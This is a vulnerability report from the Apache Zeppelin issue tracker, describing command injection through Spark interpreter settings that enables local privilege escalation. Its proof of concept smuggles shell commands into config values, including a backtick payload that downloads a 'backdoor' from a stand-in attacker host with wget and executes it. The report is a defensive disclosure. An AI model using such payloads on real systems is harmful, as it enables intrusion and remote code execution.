Uploaded image for project: 'Zeppelin'
  1. Zeppelin
  2. ZEPPELIN-4194

System command injection via Spark Interpreter configuration

    XMLWordPrintableJSON

    Details

    • Type: Bug
    • Status: Open
    • Priority: Minor
    • Resolution: Unresolved
    • Affects Version/s: 0.8.0
    • Fix Version/s: None
    • Component/s: zeppelin-server

      Description

      Hi

      We have found that system commands can be injected into Spark interpreter settings (maybe other interpreter's settings are affected as well). This injection will be executed when any Spark job will run. 

      This injection could be a security issue in environments where users have permissions to change interpreter settings - then it lead to local privilege escalation (normally user can execute  notes with special user that is used for interpreter, but injected commands will be executed with zeppelin user).

      PoC:

       (this example will also crash Spark jobs because command line is truncated)

       
      spark.executor.memory=16g;touch${IFS%?}/tmp/test
       

       or another example, in this case Spark jobs will be executed normally without interruption 

      spark.driver.cores=2`{wget,-O,/tmp/x,http://attacker_server:443/backdoor};{chmod,0755,/tmp/x};{bash,-c,/tmp/x}`

      Expectation:

      Parameters should be validated and filtered to prevent injections into the command line.

        Attachments

          Activity

            People

            • Assignee:
              Unassigned
              Reporter:
              eik00d Alexey Sintsov
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated: